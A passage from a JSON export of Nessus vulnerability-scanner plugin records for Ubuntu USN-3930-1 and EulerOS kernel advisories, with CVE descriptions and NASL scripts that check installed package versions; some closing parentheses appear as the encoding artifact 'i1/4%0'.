use-after-free vulnerability in the SCTP\nimplementation in the Linux kernel. A local attacker could use this to\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2019-8956)\n\nIt was discovered that the Linux kernel did not properly deallocate\nmemory when handling certain errors while reading files. A local\nattacker could use this to cause a denial of service (excessive memory\nconsumption). (CVE-2019-8980)\n\nIt was discovered that a use-after-free vulnerability existed in the\nIPMI implementation in the Linux kernel. A local attacker with access\nto the IPMI character device files could use this to cause a denial of\nservice (system crash). 
(CVE-2019-9003)\n\nJann Horn discovered that the SNMP NAT implementation in the Linux\nkernel performed insufficient ASN.1 length checks. An attacker could\nuse this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2019-9162)\n\nJann Horn discovered that the mmap implementation in the Linux kernel\ndid not properly check for the mmap minimum address in some\nsituations. A local attacker could use this to assist exploiting a\nkernel NULL pointer dereference vulnerability. (CVE-2019-9213).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 21, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-04-03T00:00:00", "title": "Ubuntu 18.10 : linux, linux-aws, linux-azure, linux-gcp, linux-kvm, linux-raspi2 (USN-3930-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-7222", "CVE-2019-3460", "CVE-2018-19824", "CVE-2019-9003", "CVE-2019-8980", "CVE-2019-8912", "CVE-2019-9162", "CVE-2019-8956", "CVE-2019-7221", "CVE-2019-6974", "CVE-2019-3459", "CVE-2019-9213", "CVE-2019-7308"], "modified": "2021-04-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-azure", "p-cpe:/a:canonical:ubuntu_linux:linux-image-kvm", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-virtual", "p-cpe:/a:canonical:ubuntu_linux:linux-image-gcp", "p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi2", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-snapdragon", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-gcp", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-raspi2", "cpe:/o:canonical:ubuntu_linux:18.10", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-kvm", "p-cpe:/a:canonical:ubuntu_linux:linux-image-snapdragon", 
"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-aws", "p-cpe:/a:canonical:ubuntu_linux:linux-image-aws", "p-cpe:/a:canonical:ubuntu_linux:linux-image-azure", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-gke"], "id": "UBUNTU_USN-3930-1.NASL", "href": "https://www.tenable.com/plugins/nessus/123676", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3930-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(123676);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2020/01/27\");\n\n script_cve_id(\"CVE-2018-19824\", \"CVE-2019-3459\", \"CVE-2019-3460\", \"CVE-2019-6974\", \"CVE-2019-7221\", \"CVE-2019-7222\", \"CVE-2019-7308\", \"CVE-2019-8912\", \"CVE-2019-8956\", \"CVE-2019-8980\", \"CVE-2019-9003\", \"CVE-2019-9162\", \"CVE-2019-9213\");\n script_xref(name:\"USN\", value:\"3930-1\");\n\n script_name(english:\"Ubuntu 18.10 : linux, linux-aws, linux-azure, linux-gcp, linux-kvm, linux-raspi2 (USN-3930-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Mathias Payer and Hui Peng discovered a use-after-free vulnerability\nin the Advanced Linux Sound Architecture (ALSA) subsystem. 
A\nphysically proximate attacker could use this to cause a denial of\nservice (system crash). (CVE-2018-19824)\n\nShlomi Oberman, Yuli Shapiro, and Ran Menscher discovered an\ninformation leak in the Bluetooth implementation of the Linux kernel.\nAn attacker within Bluetooth range could use this to expose sensitive\ninformation (kernel memory). (CVE-2019-3459, CVE-2019-3460)\n\nJann Horn discovered that the KVM implementation in the Linux kernel\ncontained a use-after-free vulnerability. An attacker in a guest VM\nwith access to /dev/kvm could use this to cause a denial of service\n(guest VM crash). (CVE-2019-6974)\n\nJim Mattson and Felix Wilhelm discovered a use-after-free\nvulnerability in the KVM subsystem of the Linux kernel, when using\nnested virtual machines. A local attacker in a guest VM could use this\nto cause a denial of service (system crash) or possibly execute\narbitrary code in the host system. (CVE-2019-7221)\n\nFelix Wilhelm discovered that an information leak vulnerability\nexisted in the KVM subsystem of the Linux kernel, when nested\nvirtualization is used. A local attacker could use this to expose\nsensitive information (host system memory to a guest VM).\n(CVE-2019-7222)\n\nJann Horn discovered that the eBPF implementation in the Linux kernel\nwas insufficiently hardened against Spectre V1 attacks. A local\nattacker could use this to expose sensitive information.\n(CVE-2019-7308)\n\nIt was discovered that a use-after-free vulnerability existed in the\nuser- space API for crypto (af_alg) implementation in the Linux\nkernel. A local attacker could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2019-8912)\n\nJakub Jirasek discovered a use-after-free vulnerability in the SCTP\nimplementation in the Linux kernel. A local attacker could use this to\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. 
(CVE-2019-8956)\n\nIt was discovered that the Linux kernel did not properly deallocate\nmemory when handling certain errors while reading files. A local\nattacker could use this to cause a denial of service (excessive memory\nconsumption). (CVE-2019-8980)\n\nIt was discovered that a use-after-free vulnerability existed in the\nIPMI implementation in the Linux kernel. A local attacker with access\nto the IPMI character device files could use this to cause a denial of\nservice (system crash). (CVE-2019-9003)\n\nJann Horn discovered that the SNMP NAT implementation in the Linux\nkernel performed insufficient ASN.1 length checks. An attacker could\nuse this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2019-9162)\n\nJann Horn discovered that the mmap implementation in the Linux kernel\ndid not properly check for the mmap minimum address in some\nsituations. A local attacker could use this to assist exploiting a\nkernel NULL pointer dereference vulnerability. (CVE-2019-9213).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3930-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-8956\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Reliable Datagram Sockets (RDS) rds_atomic_free_op NULL pointer dereference Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-aws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-azure\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-gcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-lowlatency\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-snapdragon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-aws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-azure\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-gcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-gke\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-snapdragon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/12/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/04/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2019-2020 Canonical, Inc. / NASL script (C) 2019-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(18\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 18.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2018-19824\", \"CVE-2019-3459\", \"CVE-2019-3460\", \"CVE-2019-6974\", \"CVE-2019-7221\", \"CVE-2019-7222\", \"CVE-2019-7308\", \"CVE-2019-8912\", \"CVE-2019-8956\", \"CVE-2019-8980\", \"CVE-2019-9003\", \"CVE-2019-9162\", \"CVE-2019-9213\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3930-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-4.18.0-1008-gcp\", pkgver:\"4.18.0-1008.9\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-4.18.0-1009-kvm\", pkgver:\"4.18.0-1009.9\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-4.18.0-1011-raspi2\", pkgver:\"4.18.0-1011.13\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-4.18.0-1012-aws\", pkgver:\"4.18.0-1012.14\")) 
flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-4.18.0-1014-azure\", pkgver:\"4.18.0-1014.14\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-4.18.0-17-generic\", pkgver:\"4.18.0-17.18\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-4.18.0-17-generic-lpae\", pkgver:\"4.18.0-17.18\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-4.18.0-17-lowlatency\", pkgver:\"4.18.0-17.18\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-4.18.0-17-snapdragon\", pkgver:\"4.18.0-17.18\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-aws\", pkgver:\"4.18.0.1012.12\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-azure\", pkgver:\"4.18.0.1014.15\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-gcp\", pkgver:\"4.18.0.1008.8\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-generic\", pkgver:\"4.18.0.17.18\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-generic-lpae\", pkgver:\"4.18.0.17.18\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-gke\", pkgver:\"4.18.0.1008.8\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-kvm\", pkgver:\"4.18.0.1009.9\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-lowlatency\", pkgver:\"4.18.0.17.18\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-raspi2\", pkgver:\"4.18.0.1011.8\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-snapdragon\", pkgver:\"4.18.0.17.18\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-virtual\", pkgver:\"4.18.0.17.18\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.18-aws / 
linux-image-4.18-azure / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-09T16:59:20", "description": "According to the versions of the kernel packages installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - A flaw was found in the way the Linux kernel's perf\n subsystem retrieved userlevel stack traces on PowerPC\n systems. A local, unprivileged user could use this flaw\n to cause a denial of service on the system by creating\n a special stack layout that would force the\n perf_callchain_user_64() function into an infinite\n loop.(CVE-2015-6526i1/4%0\n\n - A vulnerability was found in the Linux kernel. Payloads\n of NM entries are not supposed to contain NUL. When\n such entry is processed, only the part prior to the\n first NUL goes into the concatenation (i.e. the\n directory entry name being encoded by a bunch of NM\n entries). The process stops when the amount collected\n so far + the claimed amount in the current NM entry\n exceed 254. However, the value returned as the total\n length is the sum of *claimed* sizes, not the actual\n amount collected. And that's what will be passed to\n readdir() callback as the name length - 8Kb\n __copy_to_user() from a buffer allocated by\n __get_free_page().(CVE-2016-4913i1/4%0\n\n - The perf_trace_event_perm function in\n kernel/trace/trace_event_perf.c in the Linux kernel\n before 3.12.2 does not properly restrict access to the\n perf subsystem, which allows local users to enable\n function tracing via a crafted\n application.(CVE-2013-2930i1/4%0\n\n - The mincore() implementation in mm/mincore.c in the\n Linux kernel through 4.19.13 allowed local attackers to\n observe page cache access patterns of other processes\n on the same system, potentially allowing sniffing of\n secret information. (Fixing this affects the output of\n the fincore program.) 
Limited remote exploitation may\n be possible, as demonstrated by latency differences in\n accessing public files from an Apache HTTP\n Server.(CVE-2019-5489i1/4%0\n\n - It was found that the espfix functionality could be\n bypassed by installing a 16-bit RW data segment into\n GDT instead of LDT (which espfix checks), and using\n that segment on the stack. A local, unprivileged user\n could potentially use this flaw to leak kernel stack\n addresses.(CVE-2014-8133i1/4%0\n\n - An issue was discovered in the btrfs filesystem code in\n the Linux kernel. An out-of-bounds access is possible\n in write_extent_buffer() when mounting and operating a\n crafted btrfs image due to a lack of verification at\n mount time within the btrfs_read_block_groups() in\n fs/btrfs/extent-tree.c function. This could lead to a\n system crash and a denial of service.(CVE-2018-14610i1/4%0\n\n - kernel/bpf/verifier.c in the Linux kernel through\n 4.14.8 mishandles states_equal comparisons between the\n pointer data type and the UNKNOWN_VALUE data type,\n which allows local users to obtain potentially\n sensitive address information, aka a 'pointer\n leak.'(CVE-2017-17864i1/4%0\n\n - drivers/hid/hid-lenovo-tpkbd.c in the Human Interface\n Device (HID) subsystem in the Linux kernel through\n 3.11, when CONFIG_HID_LENOVO_TPKBD is enabled, allows\n physically proximate attackers to cause a denial of\n service (heap-based out-of-bounds write) via a crafted\n device.(CVE-2013-2894i1/4%0\n\n - Memory leak in the sas_smp_get_phy_events function in\n drivers/scsi/libsas/sas_expander.c in the Linux kernel\n allows local users to cause a denial of service (kernel\n memory exhaustion) via multiple read accesses to files\n in the /sys/class/sas_phy directory.(CVE-2018-7757i1/4%0\n\n - It was found that the original fix for CVE-2016-6786\n was incomplete. 
There exist a race between two\n concurrent sys_perf_event_open() calls when both try\n and move the same pre-existing software group into a\n hardware context.(CVE-2017-6001i1/4%0\n\n - In the Linux kernel before 4.20.12,\n net/ipv4/netfilter/nf_nat_snmp_basic_main.c in the SNMP\n NAT module has insufficient ASN.1 length checks (aka an\n array index error), making out-of-bounds read and write\n operations possible, leading to an OOPS or local\n privilege escalation. This affects snmp_version and\n snmp_helper.(CVE-2019-9162i1/4%0\n\n - An information leak flaw was found in the way the Linux\n kernel's Advanced Linux Sound Architecture (ALSA)\n implementation handled access of the user control's\n state. A local, privileged user could use this flaw to\n leak kernel memory to user space.(CVE-2014-4652i1/4%0\n\n - A flaw was found that the vfs_rename() function did not\n detect hard links on overlayfs. A local, unprivileged\n user could use the rename syscall on overlayfs on top\n of xfs to crash the system.(CVE-2016-6198i1/4%0\n\n - It was found that when file permissions were modified\n via chmod and the user modifying them was not in the\n owning group or capable of CAP_FSETID, the setgid bit\n would be cleared. Setting a POSIX ACL via setxattr sets\n the file permissions as well as the new ACL, but\n doesn't clear the setgid bit in a similar way. This\n could allow a local user to gain group privileges via\n certain setgid applications.(CVE-2016-7097i1/4%0\n\n - A flaw was found in the way the Linux kernel's Crypto\n subsystem handled automatic loading of kernel modules.\n A local user could use this flaw to load any installed\n kernel module, and thus increase the attack surface of\n the running kernel.(CVE-2014-9644i1/4%0\n\n - An arbitrary memory r/w access issue was found in the\n Linux kernel compiled with the eBPF bpf(2) system call\n (CONFIG_BPF_SYSCALL) support. 
The issue could occur due\n to calculation errors in the eBPF verifier module,\n triggered by user supplied malicious BPF program. An\n unprivileged user could use this flaw to escalate their\n privileges on a system. Setting parameter\n 'kernel.unprivileged_bpf_disabled=1' prevents such\n privilege escalation by restricting access to bpf(2)\n call.(CVE-2017-16995i1/4%0\n\n - A flaw was found in the implementation of associative\n arrays where the add_key systemcall and KEYCTL_UPDATE\n operations allowed for a NULL payload with a nonzero\n length. When accessing the payload within this length\n parameters value, an unprivileged user could trivially\n cause a NULL pointer dereference (kernel\n oops).(CVE-2017-15274i1/4%0\n\n - A flaw was found in the Linux kernel's keyring handling\n code: the key_reject_and_link() function could be\n forced to free an arbitrary memory block. An attacker\n could use this flaw to trigger a use-after-free\n condition on the system, potentially allowing for\n privilege escalation.(CVE-2016-4470i1/4%0\n\n - A flaw was found in the way certain interfaces of the\n Linux kernel's Infiniband subsystem used write() as\n bi-directional ioctl() replacement, which could lead to\n insufficient memory security checks when being invoked\n using the splice() system call. A local unprivileged\n user on a system with either Infiniband hardware\n present or RDMA Userspace Connection Manager Access\n module explicitly loaded, could use this flaw to\n escalate their privileges on the\n system.(CVE-2016-4565i1/4%0\n\n - It was found that the Linux kernel's IPv6 network stack\n did not properly validate the value of the MTU variable\n when it was set. 
A remote attacker could potentially\n use this flaw to disrupt a target system's networking\n (packet loss) by setting an invalid MTU value, for\n example, via a NetworkManager daemon that is processing\n router advertisement packets running on the target\n system.(CVE-2015-8215i1/4%0\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 12, "cvss3": {"score": 7.0, "vector": "AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-05-14T00:00:00", "title": "EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1532)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9644", "CVE-2013-2894", "CVE-2016-7097", "CVE-2018-14610", "CVE-2017-15274", "CVE-2015-8215", "CVE-2016-4913", "CVE-2017-6001", "CVE-2017-16995", "CVE-2018-7757", "CVE-2015-6526", "CVE-2019-9162", "CVE-2016-6198", "CVE-2014-4652", "CVE-2013-2930", "CVE-2016-6786", "CVE-2016-4470", "CVE-2014-8133", "CVE-2016-4565", "CVE-2017-17864", "CVE-2019-5489"], "modified": "2019-05-14T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:kernel-tools-libs-devel", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-devel", "cpe:/o:huawei:euleros:uvp:3.0.1.0", "p-cpe:/a:huawei:euleros:python-perf", "p-cpe:/a:huawei:euleros:kernel-tools-libs"], "id": "EULEROS_SA-2019-1532.NASL", "href": "https://www.tenable.com/plugins/nessus/124985", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124985);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/08\");\n\n script_cve_id(\n 
\"CVE-2013-2894\",\n \"CVE-2013-2930\",\n \"CVE-2014-4652\",\n \"CVE-2014-8133\",\n \"CVE-2014-9644\",\n \"CVE-2015-6526\",\n \"CVE-2015-8215\",\n \"CVE-2016-4470\",\n \"CVE-2016-4565\",\n \"CVE-2016-4913\",\n \"CVE-2016-6198\",\n \"CVE-2016-7097\",\n \"CVE-2017-15274\",\n \"CVE-2017-16995\",\n \"CVE-2017-17864\",\n \"CVE-2017-6001\",\n \"CVE-2018-14610\",\n \"CVE-2018-7757\",\n \"CVE-2019-5489\",\n \"CVE-2019-9162\"\n );\n script_bugtraq_id(\n 62052,\n 64318,\n 68170,\n 71684,\n 72320\n );\n\n script_name(english:\"EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1532)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - A flaw was found in the way the Linux kernel's perf\n subsystem retrieved userlevel stack traces on PowerPC\n systems. A local, unprivileged user could use this flaw\n to cause a denial of service on the system by creating\n a special stack layout that would force the\n perf_callchain_user_64() function into an infinite\n loop.(CVE-2015-6526i1/4%0\n\n - A vulnerability was found in the Linux kernel. Payloads\n of NM entries are not supposed to contain NUL. When\n such entry is processed, only the part prior to the\n first NUL goes into the concatenation (i.e. the\n directory entry name being encoded by a bunch of NM\n entries). The process stops when the amount collected\n so far + the claimed amount in the current NM entry\n exceed 254. However, the value returned as the total\n length is the sum of *claimed* sizes, not the actual\n amount collected. 
And that's what will be passed to\n readdir() callback as the name length - 8Kb\n __copy_to_user() from a buffer allocated by\n __get_free_page().(CVE-2016-4913i1/4%0\n\n - The perf_trace_event_perm function in\n kernel/trace/trace_event_perf.c in the Linux kernel\n before 3.12.2 does not properly restrict access to the\n perf subsystem, which allows local users to enable\n function tracing via a crafted\n application.(CVE-2013-2930i1/4%0\n\n - The mincore() implementation in mm/mincore.c in the\n Linux kernel through 4.19.13 allowed local attackers to\n observe page cache access patterns of other processes\n on the same system, potentially allowing sniffing of\n secret information. (Fixing this affects the output of\n the fincore program.) Limited remote exploitation may\n be possible, as demonstrated by latency differences in\n accessing public files from an Apache HTTP\n Server.(CVE-2019-5489i1/4%0\n\n - It was found that the espfix functionality could be\n bypassed by installing a 16-bit RW data segment into\n GDT instead of LDT (which espfix checks), and using\n that segment on the stack. A local, unprivileged user\n could potentially use this flaw to leak kernel stack\n addresses.(CVE-2014-8133i1/4%0\n\n - An issue was discovered in the btrfs filesystem code in\n the Linux kernel. An out-of-bounds access is possible\n in write_extent_buffer() when mounting and operating a\n crafted btrfs image due to a lack of verification at\n mount time within the btrfs_read_block_groups() in\n fs/btrfs/extent-tree.c function. 
This could lead to a\n system crash and a denial of service.(CVE-2018-14610i1/4%0\n\n - kernel/bpf/verifier.c in the Linux kernel through\n 4.14.8 mishandles states_equal comparisons between the\n pointer data type and the UNKNOWN_VALUE data type,\n which allows local users to obtain potentially\n sensitive address information, aka a 'pointer\n leak.'(CVE-2017-17864i1/4%0\n\n - drivers/hid/hid-lenovo-tpkbd.c in the Human Interface\n Device (HID) subsystem in the Linux kernel through\n 3.11, when CONFIG_HID_LENOVO_TPKBD is enabled, allows\n physically proximate attackers to cause a denial of\n service (heap-based out-of-bounds write) via a crafted\n device.(CVE-2013-2894i1/4%0\n\n - Memory leak in the sas_smp_get_phy_events function in\n drivers/scsi/libsas/sas_expander.c in the Linux kernel\n allows local users to cause a denial of service (kernel\n memory exhaustion) via multiple read accesses to files\n in the /sys/class/sas_phy directory.(CVE-2018-7757i1/4%0\n\n - It was found that the original fix for CVE-2016-6786\n was incomplete. There exist a race between two\n concurrent sys_perf_event_open() calls when both try\n and move the same pre-existing software group into a\n hardware context.(CVE-2017-6001i1/4%0\n\n - In the Linux kernel before 4.20.12,\n net/ipv4/netfilter/nf_nat_snmp_basic_main.c in the SNMP\n NAT module has insufficient ASN.1 length checks (aka an\n array index error), making out-of-bounds read and write\n operations possible, leading to an OOPS or local\n privilege escalation. This affects snmp_version and\n snmp_helper.(CVE-2019-9162i1/4%0\n\n - An information leak flaw was found in the way the Linux\n kernel's Advanced Linux Sound Architecture (ALSA)\n implementation handled access of the user control's\n state. A local, privileged user could use this flaw to\n leak kernel memory to user space.(CVE-2014-4652i1/4%0\n\n - A flaw was found that the vfs_rename() function did not\n detect hard links on overlayfs. 
A local, unprivileged\n user could use the rename syscall on overlayfs on top\n of xfs to crash the system.(CVE-2016-6198i1/4%0\n\n - It was found that when file permissions were modified\n via chmod and the user modifying them was not in the\n owning group or capable of CAP_FSETID, the setgid bit\n would be cleared. Setting a POSIX ACL via setxattr sets\n the file permissions as well as the new ACL, but\n doesn't clear the setgid bit in a similar way. This\n could allow a local user to gain group privileges via\n certain setgid applications.(CVE-2016-7097i1/4%0\n\n - A flaw was found in the way the Linux kernel's Crypto\n subsystem handled automatic loading of kernel modules.\n A local user could use this flaw to load any installed\n kernel module, and thus increase the attack surface of\n the running kernel.(CVE-2014-9644i1/4%0\n\n - An arbitrary memory r/w access issue was found in the\n Linux kernel compiled with the eBPF bpf(2) system call\n (CONFIG_BPF_SYSCALL) support. The issue could occur due\n to calculation errors in the eBPF verifier module,\n triggered by user supplied malicious BPF program. An\n unprivileged user could use this flaw to escalate their\n privileges on a system. Setting parameter\n 'kernel.unprivileged_bpf_disabled=1' prevents such\n privilege escalation by restricting access to bpf(2)\n call.(CVE-2017-16995i1/4%0\n\n - A flaw was found in the implementation of associative\n arrays where the 